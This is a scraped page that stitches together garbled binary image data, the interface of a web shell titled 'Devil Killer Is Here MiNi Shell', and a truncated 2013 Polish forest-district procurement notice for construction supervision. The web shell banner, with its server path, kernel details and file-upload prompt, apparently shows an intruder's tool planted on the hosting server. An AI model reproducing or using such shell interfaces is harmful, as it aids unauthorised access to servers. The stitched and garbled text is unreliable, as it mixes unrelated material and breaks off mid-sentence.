JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130806/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130806/156637-N-2013.html

<p class="kh_header"><b>Narol: Pełnienie funkcji inspektora nadzoru inwestorskiego przy realizacji robót budowlanych na terenie Nadleśnictwa Narol</b><br>
<b>Numer ogłoszenia: 156637 - 2013; data zamieszczenia: 06.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Narol , ul. Bohaterów Września 1939 roku 38, 37-610 Narol, woj. podkarpackie, tel. 016 6317020, faks 016 6317020.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostka organizacyjna nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji inspektora nadzoru inwestorskiego przy realizacji robót budowlanych na terenie Nadleśnictwa Narol.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pełnienie funkcji inspektora nadzoru inwestorskiego przy realizacji robót budowlanych w Nadleśnictwie Narol, które ze względów organizacyjnych podzielono na 3 części:
Część I: Pełnienie funkcji inspektora nadzoru inwestorskiego przy: Przebudowa kanalizacji w Nadleśnictwie Narol
Część II: Pełnienie funkcji inspektora nadzoru inwestorskiego przy: Przebudowa budynku mieszkalnego nr inw. 165-49 w leśnictwie Złomy
Część III: Pełnienie funkcji inspektora nadzoru inwestorskiego przy: Modernizacja sieci komputerowej w budynku administracyjnym nr inw. 142-87
Nadzór inwestorski będzie obejmował następujący zakres prac:
Część I: Pełnienie funkcji inspektora nadzoru inwestorskiego przy: Przebudowa kanalizacji w Nadleśnictwie Narol
Przedmiotem inwestycji jest budowa odcinka sieci kanalizacji sanitarnej wraz z przyłączami. Działki na których inwestycja jest zlokalizowana  są zabudowane (zabudowa wielorodzinna, jednorodzinna, biurowiec), istniejąca kanalizacja sanitarna jest w złym stanie technicznym.
Ścieki prowadzone będą kanalizacją grawitacyjną wykonaną z rur PVC prz.200na4,9 oraz prz.160na4,0. Na trasie odcinka grawitacyjnego zaprojektowano studnie rewizyjne systemowe PVC systemu Wavin o średnicy rury wznośnej prz.400.
Do miejsca włączenia ścieki prowadzone będą kanalizacją grawitacyjną wykonaną z rur PVC-U N o średnicach i łącznej długości:
prz.160na4,0-55,50mb
prz.200na4,9-501,50mb
Na trasie odcinków grawitacyjnych zaprojektowano 26 studni rewizyjnych systemowych, kinety PE Wavin o średnicy rury wznośnej prz.400 w ilości:
prz.200zamknięcie stożkiem betonowym- 4szt
prz.200zamknięcie rurą teleskopową-22szt
Z istniejących budynków zaprojektowano odprowadzanie ścieków rurami PVC-U N o średnicy - prz.160na4,0 - 66,00mb oraz prz.200na4,9-43,50mb
Przed przystąpieniem do wykonania wykopów należy wytyczyć trasę przyłącza przez uprawnionego geodetę zgodnie z projektem. Wykopy należy wykonać na głębokości zgodnie z rys. profil podłużny (załącznik nr 6), bez naruszenia struktury dna. Wykopy należy zabezpieczyć poprzez umocnienie ścian balami drewnianymi o następujących wymiarach:
-bale przyścienne o grub. min 50mm kl. III-IV, lub elementy profilowane z blach stalowych o wytrzymałości odpowiadającej balom drewnianym,
-bale podrozporowe o grub. co najmniej 63mm kl. III-IV,
-bale podzastrzałowe o grub. co najmniej 100mm kl. III-IV,
-okrąglaki o średnicy w cieńszym końcu co najmniej 12cm lub typowe rozpory stalowe,
-zastrzały do zabezpieczenia podpartych ścian wykopu, wykonane z okrąglaków o średnicy w cieńszym końcu co najmniej 20cm.
Rozstaw podparcia lub rozparcia ścian wykopów wynosi w układzie pionowym do 1m, a w układzie poziomym do 1,5m.
Przy wykonywaniu robót ziemnych  metodą rozkopu koparka powinna być ustawiona w odległości co najmniej 0,60m poza klinem odłamu dla danej kategorii gruntu. Przewody kanalizacji tłocznej i grawitacyjnej należy układać w wykopie na odpowiednio przygotowanym podłożu. Polega to na wykonaniu podsypki piaskowej gr.15cm oraz wyprofilowaniu wgłębień pod kielichy oraz oczyszczenie z materiałów twardych mogących uszkodzić układane rury. Sieć kanalizacji grawitacyjnej będzie wykonana z rur PVC 200na4,9 oraz160na4,0. Łączenie rur PVC wykonać na uszczelkę gumową na wcisk. Wykonawca powinien zaopatrzyć się w specjalne urządzenie do wykonywania połączeń wciskowych  lub wykonać je metodą warsztatową wg rysunku konstrukcyjnego, który można otrzymać od producenta rur. Roboty montażowe zaleca się prowadzić przy temp. od +5st.C do +15st.C, z uwagi na znaczną rozszerzalność i kruchość tworzywa. Ułożony przewód podbić obustronnie oraz przysypać warstwą gruntu rodzimego z jego zagęszczeniem. Materiał użyty do zasypki nie powinien zawierać gruzu, kamieni i innych materiałów twardych mogących uszkodzić rurę. Projektuje się studzienki z tworzywa sztucznego WAVIN z trzonową rurą karbowaną  o średnicy 400 mm,  nieprzełazową. W skład studzienki wchodzi kineta, rura karbowana, zamkniecie stożkiem betonowym lub rurą teleskopową. Kinetę należy spoziomować na około 10cm warstwie wyrównawczej (podsypce). Kineta posiada spadek wewnętrzny 15prom. Po wykonaniu odcinka między studzienkami należy poddać próbie szczelności. W tym celu badany odcinek zamyka się w studzienkach i z dolnego końca napełnia wodą, dbając o dobre odpowietrzenie. Przewód pozostaje napełniony wodą przez 6 godzin w celu nasycenia nią ścianek studni. W tym czasie ubytki wody uzupełnia się bez pomiaru ich wielkości. Po 6 godzinach napełniania dolewa się wody tak, aby jej poziom w górnej studzience  ustalił się na wysokości 0,5m ponad wierzch rury. Teraz w miarę ubytku wody dodaje się jej z naczynia o znanej pojemności i utrzymuje ustalony poziom. Czas trwania tej próby wynosi 2 godziny. Wyniki badań uważa się za dodatnie jeżeli ilość dolanej wody nie przekroczy ilości dopuszczalnej wg normy PN-73-B-10735 dla odcinka przewodu o danej średnicy i długości. Na trasie projektowanej sieci nie przewiduje się wycinki drzew. Prowadzone roboty ziemne nie powodują naruszenia systemu korzeniowego drzew. Trasę zaprojektowano z zachowaniem ochrony drzewostanu i krzewów na całym odcinku projektowanej sieci i przyłączy. Przyjęte rozwiązania zapewniają uniknięcia sytuacji awaryjnych w trakcie budowy i eksploatacji. Przy przejściach kanalizacji w odległości większej niż 2m od istniejącego drzewostanu, w celu ochrony jego systemu korzeniowego należy wykonać ekran  czyli zabezpieczenie izolujące od niekorzystnego wpływu robót ziemnych. Korzenie znajdujące się w rowie należy odciąć od strony drzewa, powierzchnię cięcia wygładzić ostrym nożem i zabezpieczyć środkiem impregnacji Balsam Loc. Od strony przewidywanego wykopu  wbić paliki, rozwiesić na nich drut i tkaninę jutową. Na zakończenie cały rów wypełnić dwiema warstwami:
poniżej poziomu korzeni pospółką żwirowo-piaskową powyżej ziemią składającą się w 20proc. z piasku, 20proc. torfu i pozostałej części z ziemi kompostowej. Substrat ten należy obficie polać wodą. 
Grube korzenie, które znajdują się w wykopie po przecięciu należy zaimpregnować i zabandażować tkaninami, które należy zwilżać. Bandaże tkaninowe mogą pozostać na korzeniach po zasypaniu wykopów. Jeśli zachodzi konieczność wykonania wykopu w obrębie rzutu korony, w odległości mniejszej niż 2m od pnia drzewa, należy zastosować metodę tzw. przeciskania. Metoda ta polega na doprowadzeniu wykopu z jednej i z drugiej strony drzewa, a następnie przekopaniu się tunelem pod bryłą korzeniową lub przełożenie danego elementu liniowego między korzeniami. Należy zawsze zwracać uwagę na zabezpieczenie systemu korzeniowego przed wysuszeniem. Utrzymywać zawsze warstwę torfu w stanie wilgoci.
Zaleca się przed rozpoczęciem robót opracować dokumentację fotograficzną przyległego drzewostanu.
Przy przekraczaniu dróg zarówno powiatowych jak i gminnych zaprojektowano zastosowanie rur ochronnych stalowych o odpowiednich długościach i średnicach, jak w części rysunkowej. Końcówki rury ochronnej uszczelnić zaślepkami termo-kurczliwymi i pianką poliuretanową zgodnie z rysunkiem szczegółowym.
Przy przekraczaniu istniejącej sieci  wodociągowej  należy zastosować  rury ochronne PVC o odpowiednich średnicach jeśli odległość w pionie pomiędzy u zbrojeniem jest mniejsza niż 0,5m. Końcówki rury ochronnej uszczelnić zaślepkami termo-kurczliwymi i pianką poliuretanową.
W miejscu przekroczeń z istniejąca siecią energetyczną lub telekomunikacyjną zaprojektowano rury śr80 bądź 100 mm typu AROT, dwudzielne, o długościach 3,0 m każda, zakładane na kablach.
W przypadku wystąpienia wody gruntowej, wykop drenarski w dnie umocnionego wykopu należy rozpocząć od wylotów rurek drenarskich do studzienek zbiorczych i prowadzić ku górze, w celu zapewnienia stałego odpływu wody.
Wykop właściwy pogłębić na całej szerokości o 40 cm w stosunku do docelowego położenia dna rurociągu. Na dnie umieścić geowłókninę. Następnie ułożyć warstwę gr. 10cm  żwiru sortowanego 8-16mm, a na niej dwa rzędy rurek drenarskich PCV 75 centralnie względem wykopu, w odległości od siebie ok. 60cm. Wypełnić geowłókninę (zasypać rurki drenarskie) uzyskując docelową grubości warstwy żwiru 3cm. Zamknąć geowłókninę na warstwie drenującej.
Rurki drenarskie sprowadzić do studzienek zbiorczych 500 umieszczonych w odległościach ok. 30m. Głębokość studzienek ok. 1,5m z osadnikiem wysokości 65cm. Pompowanie wody ze studzienek zbiorczych wykonywać w czasie układania podsypki, prac instalacyjnych, obsypki, nadsypki oraz zasypki właściwej.
Układanie drenażu zaleca się wykonać niezwłocznie po wykopaniu wykopów. Zasada działania drenu wymaga umożliwienia dopływu do niego wody gruntowej poprzez szczeliny stykowe lub otwory (dziurki, szparki podłużne) w rurkach. Na budowie należy użyć tylko jednego rodzaju materiału. Perforowane rurki z tworzyw sztucznych, z gładkimi  powierzchniami ich styków, należy łączyć za pomocą specjalnie produkowanych złączek.
Odwodnienie za pomocą igłofiltrów:
Igłofiltry należy wpłukiwać w grunt stosując obsypkę filtracyjną ze żwiru sortowanego frakcji 8-16mm. Igłofiltry należy wpłukiwać obok siebie do głębokości pożądanego obniżenia wód gruntowych. Igłofiltry po wpłukaniu należy połączyć w zestaw ssąco-tłoczący zasilany pompą. Przepompowane wody gruntowe skierować do najbliższego cieku wodnego, rowu melioracyjnego. Zespół ssąco-tłoczący zestawu igłofiltrowego należy ustawić na odpowiednim podeście, w miejscu uniemożliwiającym zalanie zespołu. Dla zasilania zespołu należy zapewnić złącze energetyczne tymczasowe z właściwym Rejonem energetycznym.
Uwagi końcowe:
a)Przy prowadzeniu robót ziemnych zwrócić uwagę na występujące uzbrojenie podziemne.
b)W miejscu występowania uzbrojenia podziemnego prace ziemne wykonać ręcznie.
c)Trasę sieci, przyłączy i umiejscowienie studzienek rewizyjnych winien wytyczyć uprawniony geodeta.
d)Przed zasypaniem powiadomić przyszłego użytkownika uzbrojenia i uprawnionego geodetę celem dokonania inwentaryzacji powykonawczej.
e)Przy wykonywaniu robót należy przestrzegać przepisów BHP zawartych w zbiorze podstawowych przepisów BHP. W szczególności tymczasowych wytycznych BHP dla pracowników zatrudnionych przy robotach wodno- kanalizacyjnych oraz robotach ziemnych.
Ponadto należy stosować się do następujących wytycznych:
-materiały odpadowe i śmieci nie mogą być gromadzone na terenie budowy, zaplecza technicznego, placów składowych i magazynów; należy je systematycznie usuwać, przewozić w miejsca do tego przeznaczone,
-wszelkie zmiany materiałów, technologii wykonania należy uzgodnić z Inspektorem Nadzoru.
Szczegółowy opis przedmiotu zamówienia zawarty jest w Dokumentacji projektowej oraz Przedmiarze robót stanowiącym załącznik nr 7 do SIWZ. 
Miejsce realizacji: teren województwa podkarpackiego, powiatu lubaczowskiego, gminy: Narol, obr. ewid. Narol obszar miejski - na dz. ew. nr.: 1809-3
Część II: Pełnienie funkcji inspektora nadzoru inwestorskiego przy: Przebudowa budynku mieszkalnego nr inw. 165-49 w leśnictwie Złomy
-przebudowa holu i wydzielenie sanitariatu
-wykonanie WC (muszla ustępowa + umywalka + natrysk z wykonaniem podejścia wod - kan)
-wykonanie przejścia z parteru na poddasze (połączenie parteru z poddaszem w części mieszkalnej)
-przestawienie otworu drzwiowego
- zmiana otworu okiennego
-rozbiórka podłóg i posadzek
-wykonanie nowych posadzek wraz z warstwami podkładowymi i izolacyjnymi
-ułożenie posadzek z paneli podłogowych i terakoty
-wymiana stolarki drzwiowej wewnętrznej i zewnętrznej
-malowanie ścian i sufitów
-remont (wymiana ) instalacji wod- kan z rozdzieleniem opomiarowania na część mieszkalną i biurową
-remont (wymiana) instalacji elektrycznej z rozdzieleniem opomiarowania na część biurową i mieszkalną 
- wymiana instalacji c.o (bez wymiany pieca i zbiornika wody ciepłej)
- rozbiórka pieców kaflowych z przeróbką przewodów dymowych na wentylacyjne
- wymiana podokienników wewnętrznych
- wymiana armatury sanitarnej
- demontaż okładziny elewacyjnej z PCV
- dodatkowe docieplenie ścian zew. wełną gr. 5 cm
- wykonanie elewacji z desek szalunkowych sosnowych impregnowanych: gr 22 mm
- wykonanie podokienników blaszanych z blachy powlekanej kolor jak dach
- wykonanie daszka nad drzwiami wejściowymi do części mieszkalnej
- wykonanie opaski wokół budynku wraz ze schodami wejściowymi do mieszkania i kancelarii z kostki betonowej kolorowej i obrzeży
- wykonanie chodników
-wykonanie szachtu zsypowego do piwnicy z klapą ocieplaną o konstrukcji metalowej, zamykanej
-wykonanie nawiewu powietrza do kotłowni w piwnicy w formie zetki
- oklejenie cokołu fundamentu styropianem wraz z ułożeniem płytek elewacyjnych klinkierowych
- wykonanie podjazdu dla osób niepełnosprawnych 
Ponadto należy stosować się do następujących wytycznych:
-materiały odpadowe i śmieci nie mogą być gromadzone na terenie budowy, zaplecza technicznego, placów składowych i magazynów; należy je systematycznie usuwać, przewozić w miejsca do tego przeznaczone,
-wszelkie zmiany materiałów, technologii wykonania należy uzgodnić z Inspektorem Nadzoru.
Szczegółowy opis przedmiotu zamówienia zawarty jest w Dokumentacji projektowej oraz Przedmiarze robót stanowiącym załącznik nr 7 do SIWZ. 
Wymienione powyżej opracowania stanowią integralną część SIWZ, a wszystkie wskazane w nich, poprzez zamieszczenie znaków towarowych, patentów lub pochodzenia, materiały (wyroby) i urządzenia należy rozumieć jako określenie wymaganych parametrów technicznych lub standardów jakościowych. Oznacza to, że zgodnie z art. 29 ustawy, w odniesieniu do materiałów (wyrobów) i urządzeń wskazanych z nazwy Zamawiający dopuszcza zastosowanie materiałów (wyrobów), tj. o jakości nie gorszej niż opisana w Dokumentacji projektowej oraz Specyfikacjach technicznych wykonania i odbioru robót budowlanych (STWiORB). 
Miejsce realizacji: teren województwa podkarpackiego, powiatu lubaczowskiego, gminy: Narol, obr. ewid. Huta Złomy - na dz. ew. nr.: 648/2 - leśnictwo Złomy. 
Część III: Pełnienie funkcji inspektora nadzoru inwestorskiego przy: Modernizacja sieci komputerowej w budynku administracyjnym nr inw. 142/87
Zakres prac dotyczy wykonania okablowania strukturalnego, montażu szafy GPD, montażu instalacji
elektrycznej zasilającej szafę i pomiarów instalacji. Za standard przyjęto okablowanie firmy Krone, osprzęt elektryczny firmy Legrand jako odnośniki, co nie wiąże w wyborze innego spójnego standardu.
System okablowania: Instalację teleinformatyczną oparto na nowoczesnym i jednorodnym, systemie okablowania strukturalnego kat. 6a klasy EA. Zastosowane rozwiązanie bazuje na topologii gwiazdy (wszystkie kable schodzą się do jednego punktu). Kabel skrętkowy prowadzony jest od każdego gniazda RJ45 przyłącza komputerowego PK do gniazda RJ45 na panelu krosowym w Głównym Punkcie Dystrybucyjnym (GPD) zlokalizowanym w serwerowni. Łącza tej klasy pozwalają na zastosowanie aplikacji do 500MHz. Po rozpatrzeniu możliwości i analizie potrzeb związanych z budową sieci strukturalnej wybrany został system okablowania strukturalnego firmy KRONE. System ten obsługiwać może wszystkie potrzeby w zakresie telekomunikacji w obiekcie poczynając od łączności telefonicznej, faksowej, przesyłania danych między komputerami- sieci LAN (Local Area Network), wideo, ISDN, sieci zabezpieczeń przeciwpożarowych, antywłamaniowych itp. aż po łączność zewnętrzną po łączach światłowodowych w standardzie ATM. Zaprojektowany system okablowania strukturalnego jest systemem całkowicie otwartym, zaspokaja potrzeby telekomunikacyjne teraz jak i w łatwy sposób można go rozbudowywać.
System ten jest bardzo elastyczny oraz podatny na zmiany, ponieważ wykorzystuje ten sam zestaw wtyków, złączy pośrednich i gniazd modularnych zarówno dla transmisji danych jak i głosu. Umożliwia, więc łatwe przenoszenie komputerów, telefonów czy terminali ISDN z jednego pomieszczenia do innego bez burzenia całości systemu przy minimalnych przerwach w pracy.
Szczegółowy opis przedmiotu zamówienia zawarty jest w Dokumentacji projektowej oraz Przedmiarze robót stanowiącym załącznik nr 7 do SIWZ. 
Wymienione powyżej opracowania stanowią integralną część SIWZ, a wszystkie wskazane w nich, poprzez zamieszczenie znaków towarowych, patentów lub pochodzenia, materiały (wyroby) i urządzenia należy rozumieć jako określenie wymaganych parametrów technicznych lub standardów jakościowych. Oznacza to, że zgodnie z art. 29 ustawy, w odniesieniu do materiałów (wyrobów) i urządzeń wskazanych z nazwy Zamawiający dopuszcza zastosowanie materiałów (wyrobów), tj. o jakości nie gorszej niż opisana w Dokumentacji projektowej oraz Specyfikacjach technicznych wykonania i odbioru robót budowlanych (STWiORB). 
Miejsce realizacji: teren województwa podkarpackiego, powiatu lubaczowskiego, gminy: Narol, obr. ewid. Narol Miasto - na dz. ew. nr.: 1809-3 - Leśnictwo Płazów..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W prowadzonym postępowaniu Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełnienia w niezbędnym zakresie warunku wiedzy i doświadczenia Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, nadzorował co najmniej trzy inwestycje o wartości usług nadzoru budowlanego:
Dla Części I - łącznie 20 000,00 zł, przy czym w ramach tychże inwestycji:
- wartość robót budowlanych polegających na budowie lub przebudowie lub remoncie co najmniej jednej z trzech wymaganych robót wynosi co najmniej 50 000,00 zł - słownie: pięćdziesiąt tysięcy złotych 00/100 brutto.
Dla Części II - łącznie 20 000,00 zł, przy czym w ramach tychże inwestycji:
- wartość robót budowlanych polegających na budowie lub przebudowie lub remoncie co najmniej jednej z trzech wymaganych robót wynosi co najmniej 50 000,00 zł - słownie: pięćdziesiąt tysięcy złotych 00/100 brutto.
Dla Części III - łącznie 5 000,00 zł, przy czym w ramach tychże inwestycji:
- wartość robót budowlanych polegających na budowie lub przebudowie lub remoncie co najmniej jednej z trzech wymaganych robót wynosi co najmniej 20 000,00 zł - słownie: dwadzieścia tysięcy złotych 00/100 brutto.

W przypadku złożenia oferty na więcej niż jedną część lub na wszystkie części zamówienia warunki dotyczące wartości usługi nadzoru budowlanego i robót budowlanych muszą być wykazane dla każdej części osobno.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunek dotyczący dysponowania osobami zdolnymi do wykonania zamówienia, tj. Wykonawca musi wykazać, iż dysponuje lub będzie dysponował:
dla Części I - co najmniej jedną osobą posiadającą uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie, obejmującą co najmniej kierowanie robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń,
dla Części II - co najmniej jedną osobą posiadającą uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie, obejmującą co najmniej kierowanie robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń,
dla Części III - co najmniej jedną osobą posiadającą uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie, obejmującą co najmniej kierowanie robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń.
uzyskane wg art. 14 Ustawy z dnia 7 lipca 1994 roku Prawo Budowlane (tj. Dz.U. z 2010 r. Nr 243, poz. 1623 ze zm., zwane dalej Prawem Budowlanym) 
W przypadku złożenia oferty na więcej niż jedną część lub na wszystkie części warunki dotyczące dysponowania osobami posiadającymi uprawnienia do realizacji zamówienia musza być wykazane dla każdej części osobno.
Przez uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanym rozumie się uprawnienia do sprawowania samodzielnych funkcji technicznych w budownictwie, wydane na podstawie ustawy z 7 lipca 1994r. Prawo Budowlane (Dz.U.10.243.1623 z póź. zmianami) oraz Rozporządzenia Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 roku w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006r. nr 83, poz. 578 ze zm.) albo odpowiadające im inne ważne uprawnienia budowlane wydane na mocy wcześniej obowiązujących przepisów. 
Zamawiający uzna za spełniony warunek posiadania uprawnień budowlanych poprzez przedstawienie osób posiadających uprawnienia budowlane w specjalnościach inaczej nazwanych lecz wyłącznie takich, które uprawniają do wykonywania tych samych czynności, do których uprawniają uprawnienia w zakresie wymaganym do realizacji przedmiotu zamówienia. Wskazane przez Wykonawcę osoby, bez względu na kraj pochodzenia i miejsce zamieszkania, muszą spełniać wymogi określone w art. 12 a Ustawy z dnia 7 lipca 1994 r. - Prawo Budowlane (tj. Dz.U. z 2010 r., Nr 243, poz. 1623 ze zm.). Zamawiający dokona oceny spełnienia powyższego warunku na podstawie informacji i danych zawartych w dokumentach i oświadczeniach, które Wykonawca jest zobowiązany dołączyć do oferty, które zostały określone w pkt. 10.4.2 i 10.4.3 SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest wykazać, że posiada ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej działalności zgodnej z przedmiotem zamówienia w wysokości nie mniejszej niż:
